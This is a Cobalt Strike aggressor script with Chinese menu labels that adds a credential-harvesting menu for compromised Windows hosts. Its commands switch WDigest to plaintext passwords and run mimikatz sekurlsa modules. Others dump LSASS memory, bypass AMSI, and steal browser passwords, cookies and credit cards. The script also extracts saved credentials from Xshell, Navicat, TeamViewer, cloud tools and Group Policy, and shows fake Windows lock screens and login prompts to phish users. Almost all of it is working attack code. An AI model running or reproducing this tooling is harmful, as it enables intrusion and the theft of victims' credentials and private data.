##############################
#                            #
#                            #
#                            #
#       xway.cn@panda8       #
#       secquan.org@panda8   #
#		t00ls.com@panda8     #
#                            #
#                            #
#                            #
##############################
menu "获取凭证" {
        include(script_resource("modules/RdpThief.cna"));
			
		menu "修改注册表dump明文密码" {
			item "显示明文" {
      local('$bid');
      foreach $bid ($1){
        bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f");
      }
    }
			item "锁屏" {
             prompt_text("确定锁屏?", "", lambda({
            bshell(@ids, "rundll32.exe user32.dll,LockWorkStation");
        }, @ids => $1));
    }
			item "隐藏明文" {
      local('$bid');
      foreach $bid ($1){
        bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f");
      }
    }
  }

    	menu "LaZagne"{
    		item "上传lazagne"{
        	local('$bid');
        	foreach $bid ($1){
            bupload($1, script_resource("/script/lazagne.exe"));
        		}
        	}
        	item "运行LaZagne" {
			$bid = $1['@'];
			$dialog = dialog("LaZagne", %(args => "",bid => $bid), &lazagne_run);
			drow_combobox($dialog, "args", "args:", @("all","browsers","chats","mails","git","svn","windows","wifi","maven","sysadmin","games","multimedia","memory","databases","php"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        	}

sub lazagne_run{
	$arg = join(' ', @($3['args']));
	bshell($bid, "lazagne.exe $arg");
}

			item "关闭lazagne"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "taskkill -f /im lazagne.exe");
			}
		}
        	item "删除lazagne"{
        	local('$bid');
        	foreach $bid ($1){
            	bshell($1, "del /f /s /q lazagne.exe");
        	}
		}

    	}
		
	menu "获取保存的RDP密码" {
				item "mimikatz"{
			local('$bid');
				foreach $bid ($1){
					mimikatz_rdp($bid);
            }
        }
sub mimikatz_rdp{
    bmimikatz($1, "vault::cred /patch");
}		
	menu "sharpDPAPI" {
				item "sharpDPAPI -dump"{
			local('$bid');
				foreach $bid ($1){
					rdp_dump($bid);
				}
}

sub rdp_dump{
fireAlias($1, "sharpDPAPI", "-dump");
}

				item "sharpDPAPI"{
			local('$bid');
				foreach $bid ($1){
					rdp_pass($bid);
				}
}

sub rdp_pass{
fireAlias($1, "sharpDPAPI");
}
}

}

		    	item "获取Navicat凭证"{
				bexecute_assembly($1, script_resource('/script/napwd.exe'), "");
    	}

menu "获取Xshell凭证"{
				item "自动获取"{
				bexecute_assembly($1, script_resource('/script/SharpXDecrypt.exe'), "");}
				
				item "指定session路径" {
				$bid = $1['@'];
				$dialog = dialog("指定session路径", %(sessionpath => "\"C:\\Users\\administrator\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\"",bid => $bid), &SharpXDecrypt);
				dialog_description($dialog, "指定session路径");
				drow_text($dialog, "sessionpath", "sessionpath:  ");	
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub SharpXDecrypt {
		$arg = join(' ', @($3 ['sessionpath']));
		bexecute_assembly($bid, script_resource("/script/SharpXDecrypt.exe"), $arg);
}				
}
		
		
			item "浏览器-stealer" {
			$bid = $1;
			$dialog = dialog("Stealer", %(Type => "PASSWORDS",bid => $bid), &Stealer);
			dialog_description($dialog, "Google Chrome、Opera、Chromium、Brave-Browser、Epic Privacy Browser、Amigo、Vivaldi、Orbitum、Atom、Kometa、Comodo Dragon、Torch、Slimjet、360Browser、Maxthon3、K-Melon、Sputnik、Nichrome、CocCoc Browser、Uran、Chromodo、Yandex (old)");
			drow_combobox($dialog, "Type", "Type:", @("PASSWORDS", "credit_cards","history","bookmarks","cookies"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub Stealer {
	bexecute_assembly($bid, script_resource("/script/Stealer.exe"), $3['Type']);
}

menu "浏览器-360安全浏览器" {
menu "在线解密" {
			item "上传解密程序" {
				$bid = $1;
				$dialog = dialog("上传解密程序", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &360bowser_upload);
				drow_text($dialog, "UploadPath",  "上传路径: "); 	
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
        }
sub 360bowser_upload {
		bcd($bid, $3['UploadPath']);
        bupload($bid, script_resource("/script/360bowser.exe"));
}
            item "运行解密程序"{
                    $bid = $1['@'];
                    $Dialog = dialog("运行解密程序",%(bid => $bid),&360bowser_run);
                    dialog_description($Dialog, "直接运行即可在线解密获取360浏览器保存的帐号密码");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
                }

sub 360bowser_run{
	bshell($bid, "360bowser.exe /auto");
}
        	item "删除解密程序"{
        	local('$bid');
        	foreach $bid ($1){
            	bshell($1, "del /f /s /q 360bowser.exe");
        	}
		}
}
        item "离线解密"{
		$bid = $1['@'];
                SafeBrowsergetpass($bid);
                getMachineGuid($bid);
    }
sub getMachineGuid{
	$arch = barch($1);
	if ($arch == 'x64'){
	breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
	blog($1,"作者:haya 项目地址：https://github.com/hayasec/360SafeBrowsergetpass");
	}
	else{
	breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x86");
	breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
	}
}

sub SafeBrowsergetpass {
	bshell($bid, 'reg query HKEY_CLASSES_ROOT\360seURL\shell\open\command|findstr exe');
}

on beacon_output {
	$magicstring = "360se6\\Application\\360se.exe";
	$magicstring2 = "MachineGuid";

	if ($magicstring isin $2){
	$length = strlen($2);
	$last = lindexOf($2, ":");
	$res = substr($2, $last - 1, $length - 32);
	$dbPath = "User Data\\Default\\apps\\LoginAssis\\assis2.db";
	$res = $res . $dbPath;

	bdownload($1, $res);
	blog($1,"360 SafeBrowser DB Downloading");
	}

	if ($magicstring2 isin $2){
	$lasta = lindexOf($2, "\nMachineGuid");
	$MachineGuid = substr($2, $lasta + 26, -1); 
	$beaconHost = beacon_info($1, "host");
	credential_add($empty,$MachineGuid, $empty, $empty, $beaconHost);
	blog($1,"MachineGuid Get Success");
	}
}

}

menu "浏览器-搜狗浏览器" {
            item "下载FormData3.dat(保存的帐号密码)"{
                    $bid = $1['@'];
                    $Dialog = dialog("下载FormData3.dat",%(user => "administrator",bid => $bid),&sougou_FormData);
                    dialog_description($Dialog, "通过下载搜狗浏览器的帐号数据文件(FormData3.dat)替换本地文件获取数据");
					drow_text($Dialog, "user", "user: ");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
                }

sub sougou_FormData{
		bcd($bid, "C:\\Users\\$3['user']\\AppData\\Roaming\\SogouExplorer");
		bdownload($bid, "FormData3.dat");
}

            item "下载uarchhistory3.db(历史记录)"{
                    $bid = $1['@'];
                    $Dialog = dialog("下载历史记录",%(user => "administrator",bid => $bid),&sougou_down);
                    dialog_description($Dialog, "通过下载搜狗浏览器的历史记录数据文件(HistoryUrl3.db、uarchhistory3.db、uhistory3.db)替换本地文件获取数据");
					drow_text($Dialog, "user", "user: ");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
                }

sub sougou_down{
		bcd($bid, "C:\\Users\\$3['user']\\AppData\\Roaming\\SogouExplorer");
		bdownload($bid, "HistoryUrl3.db");
		bdownload($bid, "uarchhistory3.db");
		bdownload($bid, "uhistory3.db");
}

            item "下载favorite3.dat(收藏夹)"{
                    $bid = $1['@'];
                    $Dialog = dialog("下载FormData3.dat",%(user => "administrator",bid => $bid),&sougou_favorite);
                    dialog_description($Dialog, "通过下载搜狗浏览器的收藏夹文件(favorite3.dat)替换本地文件获取数据");
					drow_text($Dialog, "user", "user: ");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
                }

sub sougou_favorite{
		bcd($bid, "C:\\Users\\$3['user']\\AppData\\Roaming\\SogouExplorer");
		bdownload($bid, "favorite3.dat");
}

}
menu "浏览器-Chrome" {			
			
		    	item "BrowserGhost"{
				bexecute_assembly($1, script_resource('/script/BrowserGhost.exe'), "");
    	}
		
menu "sharpchrome" {

		item "提取以下三项全部信息"{
			local('$bid');
				foreach $bid ($1){
					sharpchromeall($bid);
				}
			}

		item "提取浏览器Cookies"{
			local('$bid');
				foreach $bid ($1){
					sharpchromecookies($bid);
				}
			}

		item "提取浏览器历史记录"{
			local('$bid');
				foreach $bid ($1){
					sharphistory($bid);
				}
			}

		item "提取保存的密码"{
			local('$bid');
				foreach $bid ($1){
					sharplogins($bid);
				}
			}
sub sharpchromeall{
bexecute_assembly($1, script_resource('/script/SharpChromium.exe'), "all");
}

sub sharpchromecookies{
bexecute_assembly($1, script_resource('/script/SharpChromium.exe'), "cookies");
}

sub sharphistory{
bexecute_assembly($1, script_resource('/script/SharpChromium.exe'), "history");
}


sub sharplogins{
bexecute_assembly($1, script_resource('/script/SharpChromium.exe'), "logins");
}
	}


		item "SharpWeb"{
			local('$bid');
				foreach $bid ($1){
					sharpwebchrome($bid);
				}
			}
	
sub sharpwebchrome{
bexecute_assembly($1, script_resource('/script/SharpWeb.exe'), "chrome");
}


		
		
		}

		menu "浏览器-hack-browser-data" {
			item "上传hack-browser-data" {
				$bid = $1;
				$dialog = dialog("上传hack-browser-data", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &hack_browser_upload);	
				drow_text($dialog, "UploadPath",  "上传路径: "); 
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
        }
sub hack_browser_upload {
		bcd($bid, $3['UploadPath']);
        bupload($bid, script_resource("/script/hack-browser-data.exe"));  
    }
	
            item "运行hack-browser-data"{
                    $bid = $1['@'];
                    $Dialog = dialog("运行hack-browser-data",%(bid => $bid),&hack_browser_run);
                    dialog_description($Dialog, "Google Chrome、Google Chrome Beta、Firefox、Microsoft Edge、360 极速浏览器、QQ 浏览器、Brave 浏览器、Opera 浏览器、OperaGX 浏览器、Vivaldi 浏览器,运行完成,会在当前目录生成result文件夹");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
                }

sub hack_browser_run{
	bshell($bid, "hack-browser-data.exe");
}
        	item "删除hack-browser-data"{
        	local('$bid');
        	foreach $bid ($1){
            	bshell($1, "del /f /s /q hack-browser-data.exe");
        	}
		}

				}



menu "浏览器-SharpWeb" {

		item "提取所有浏览器凭证"{
			local('$bid');
				foreach $bid ($1){
					sharpweball($bid);
				}
			}


		item "提取Edge凭证"{
			local('$bid');
				foreach $bid ($1){
					sharpwebedge($bid);
				}
			}
		item "提取FireFox凭证"{
			local('$bid');
				foreach $bid ($1){
					sharpwebfirefox($bid);
				}
			}

sub sharpweball{
bexecute_assembly($1, script_resource('/script/SharpWeb.exe'), "all");
}

sub sharpwebfirefox{
bexecute_assembly($1, script_resource('/script/SharpWeb.exe'), "firefox");
}


sub sharpwebedge{
bexecute_assembly($1, script_resource('/script/SharpWeb.exe'), "edge");
}

		}
		
    menu "SharpDecryptPwd-1" {
        
		item "SharpDecryptPwd" {
			$bid = $1['@'];
			$dialog = dialog("SharpDecryptPwd", %(type => "WinSCP",bid => $bid), &SharpDecryptPwd);
			drow_combobox($dialog, "type", "Type:", @("Navicat", "TeamViewer","FileZilla","Foxmail","TortoiseSVN","WinSCP","Chrome","RDCMan","SunLogin"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
	item "DecryptXShell" {
			$bid = $1['@'];
			$dialog = dialog("DecryptXShell", %(type => "Xmanager",user => "administrator",sid => "",path => "D:\\xshell\\Xshell\\Sessions",bid => $bid), &DecryptXShell);
			dialog_description($dialog, "DecryptXShell");
			drow_combobox($dialog, "type", "Type:", @("Xmanager"));
			drow_text($dialog, "user", "user:  ");
			drow_text($dialog, "sid", "sid:  ");
			drow_text($dialog, "path", "Sessions Path:  ");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
		
    }
sub SharpDecryptPwd {
	
		bexecute_assembly($bid, script_resource("/script/SharpDecryptPwd.exe"), $3['type']);
	
}
sub DecryptXShell {
		$arg = join(' ', @($3['type'], "/user:$3['user']","/sid:$3['sid']","/path:$3['path']"));
		bexecute_assembly($bid, script_resource("/script/SharpDecryptPwd.exe"), $arg);
}	
    menu "SharpDecryptPwd-2" {
        
		item "SharpDecryptPwd" {
			$bid = $1['@'];
			$dialog = dialog("SharpDecryptPwd", %(type => "-Foxmail",bid => $bid), &SharpDecryptPwd2);
			drow_combobox($dialog, "type", "Type:", @("-Navicat", "-TeamViewer", "-FileZilla","-Foxmail","-RealVNC","-TortoiseSVN","-WinSCP"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
	item "DecryptXShell" {
			$bid = $1['@'];
			$dialog = dialog("DecryptXShell", %(type => "-Xmanager",path => "D:\\xshell\\Xshell\\Sessions",bid => $bid), &DecryptXShell2);
			dialog_description($dialog, "DecryptXShell");
			drow_combobox($dialog, "type", "Type:", @("-Xmanager"));
			drow_text($dialog, "path", "Sessions Path:  ");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
		
    }
sub SharpDecryptPwd2 {
	
		bexecute_assembly($bid, script_resource("/script/SharpDecryptPwd2.exe"), $3['type']);
	
}
sub DecryptXShell2 {
		$arg = join(' ', @($3['type'],"-p",$3['path']));
		bexecute_assembly($bid, script_resource("/script/SharpDecryptPwd2.exe"), $arg);
}	      
		  item "windows锁屏钓鱼" {
			$bid = $1;
			$dialog = dialog("FakeLogonScreen", %(bid => $bid), &FakeLogonScreen);
			dialog_description($dialog, "SharpLocker会弹出一个假的Windows锁定屏幕，帮助获得当前的用户凭据，所有输出都将发送到控制台。");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub FakeLogonScreen {
	bexecute_assembly($bid, script_resource("/script/FakeLogonScreen.exe"), "");
}

			item "弹认证登录框钓鱼" {
			$bid = $1['@'];
			$dialog = dialog("CredPhisher", %(content => "安全认证",bid => $bid), &CredPhisher);
			dialog_description($dialog, "弹出安全认证登录框，钓鱼凭证。");
			drow_text($dialog, "content", "content:");	
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }

sub CredPhisher {
		$arg = join('',@("",$3['content']));
		bexecute_assembly($bid, script_resource("/script/CredPhisher.exe"), $arg);
}	

		item "组策略提取帐户凭据" {
			bexecute_assembly($1, script_resource("/script/Net-GPPPassword.exe"), "");
		}
	

		item "读取IIS站点密码与网站路径" {
		btask($bid, "#################################",  "");
		btask($bid, "##  读取IIS站点密码、网站路径  ##", "");
		btask($bid, "#################################",  "");
			bexecute_assembly($1, script_resource("/script/Ladon.exe"), "IISpwd");
		}


menu "Mimikatz" {
		item "Mimikatz Logon Passwords"{
			local('$bid');
				foreach $bid ($1){
					logonpasswords($bid);
				}
			}
		item "Mimikatz WDigest Credentials"{
			local('$bid');
				foreach $bid ($1){
					wdigest($bid);
				}
			}
		item "Mimikatz Kerberos Credentials"{
			local('$bid');
				foreach $bid ($1){
					kerberos($bid);
				}
			}
		item "Mimikatz MSV LM & NTLM Passwords"{
			local('$bid');
				foreach $bid ($1){
					msv($bid);
				}
			}
		item "Mimikatz TsPkg Passwords"{
			local('$bid');
				foreach $bid ($1){
					tspkg($bid);
				}
			}
		item "Mimikatz LiveSSP passwords"{
			local('$bid');
				foreach $bid ($1){
					livessp($bid);
				}
			}
		item "Mimikatz SSP passwords"{
			local('$bid');
				foreach $bid ($1){
					ssp($bid);
				}
			}

		item "Mimikatz Dump Trust"{
			local('$bid');
				foreach $bid ($1){
					trust($bid);
				}
			}

		item "Mimikatz Backup Keys"{
			local('$bid');
				foreach $bid ($1){
					backupkeys($bid);
				}
			}

		item "Mimikatz Tickets"{
			local('$bid');
				foreach $bid ($1){
					tickets($bid);
				}
			}

		item "Mimikatz ekeys"{
			local('$bid');
				foreach $bid ($1){
					ekeys($bid);
				}
			}

		item "Mimikatz DPAPI"{
			local('$bid');
				foreach $bid ($1){
					dpapi($bid);
				}
			}

		item "Mimikatz DPAPI System Secret"{
			local('$bid');
				foreach $bid ($1){
					dpapisystem($bid);
				}
			}

		item "Mimikatz Credential Manager"{
			local('$bid');
				foreach $bid ($1){
					credman($bid);
				}
			}


}
sub logonpasswords{

bmimikatz($1, "sekurlsa::logonpasswords");

}
sub wdigest{

bmimikatz($1, "sekurlsa::wdigest");

}
sub kerberos{

bmimikatz($1, "sekurlsa::kerberos");

}
sub msv{

bmimikatz($1, "sekurlsa::msv");

}
sub tspkg{

bmimikatz($1, "sekurlsa::tspkg");

}
sub livessp{

bmimikatz($1, "sekurlsa::livessp");

}
sub ssp{

bmimikatz($1, "sekurlsa::ssp");

}


sub trust{

bmimikatz($1, "sekurlsa::trust");

}
sub backupkeys{

bmimikatz($1, "sekurlsa::backupkeys");

}
sub tickets{

bmimikatz($1, "sekurlsa::tickets");

}
sub ekeys{

bmimikatz($1, "sekurlsa::ekeys");

}

sub dpapi{

bmimikatz($1, "sekurlsa::dpapi");

}

sub dpapisystem{

bmimikatz($1, "sekurlsa::dpapi");

}

sub credman{

bmimikatz($1, "sekurlsa::credman");

}
menu "DumpLsass" {

		item "Ladon" {
			bexecute_assembly($1, script_resource("/script/Ladon1.exe"), "DumpLsass");
		}

	    menu "ATPMiniDump" {
			item "上传ATPMiniDump" {
				$bid = $1;
				$dialog = dialog("上传ATPMiniDump", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &ATPMiniDump);
				drow_text($dialog, "UploadPath",  "上传路径: "); 	
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
        }
sub ATPMiniDump {

    bcd($bid, $3['UploadPath']);
        bupload($bid, script_resource("/script/ATPMiniDump.exe"));
    

}
		  item "运行ATPMiniDump" {
			$bid = $1;
			$dialog = dialog("ATPMiniDump", %(bid => $bid), &ATPMiniDump_run);
			dialog_description($dialog, "使用PssCaptureSnapShot上的MiniDumpWriteDump转储LSASS内存。");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }

sub ATPMiniDump_run{
	bshell($bid, "ATPMiniDump.exe");
}

        	item "删除ATPMiniDump"{
        	local('$bid');
        	foreach $bid ($1){
            	bshell($1, "del /f /s /q ATPMiniDump.exe");
        	}
		}
		}

			item "SharpDump"{
				bexecute_assembly($1, script_resource('/script/SharpDump.exe'), "");
            }

			item "SafetyKatz" {
			bexecute_assembly($1, script_resource("/script/SafetyKatz.exe"), "");
		}
		
			item "NoAmci"{
				bexecute_assembly($1, script_resource('/script/NoAmci.exe'), "");
            }
		}

			item "获取云凭证" {
			$bid = $1['@'];
			$dialog = dialog("获取云凭证", %(bid => $bid), &SharpCloud);
			dialog_description($dialog, "检查与Amazon Web Services，Microsoft Azure和Google Compute相关的凭证文件是否存在");
			drow_combobox($dialog, "type", "type:", @("all","aws","azure","gcloud"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpCloud {
	$arg = join(' ',  @($3['type']));
	bexecute_assembly($bid, script_resource("/script/SharpCloud.exe"), $arg);
}

			item "获取AutoLogon存储的密码"{
				bexecute_assembly($1, script_resource('/script/DecryptAutoLogon.exe'), "");
            }		


			item "获取远程工具保存的凭证" {
			$bid = $1['@'];
			$dialog = dialog("获取云凭证", %(bid => $bid), &SessionGopher);
			dialog_description($dialog, "获取保存的PuTTY，WinSCP，FileZilla，SuperPuTTY和RDP的会话信息");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SessionGopher {
	bpowershell_import($bid,script_resource("/script/SessionGopher.ps1"));
	bpowerpick!($bid,"Invoke-SessionGopher -Thorough");
}

			item "获取TeamViewer凭据"{
				bexecute_assembly($1, script_resource('/script/DecryptTeamViewer.exe'), "");
            }	

		    item "获取SolarWinds Orion保存的凭证"{
				bexecute_assembly($1, script_resource('/script/SolarFlare.exe'), "");
    	}

		    item "获取系统证书"{
				bexecute_assembly($1, script_resource('/script/certexp.exe'), "");
    	}

		    item "Windows Sticky Notes保存的凭证"{
				bexecute_assembly($1, script_resource('/script/StickyNotesExtract.exe'), "");
    	}



        } 

   
    









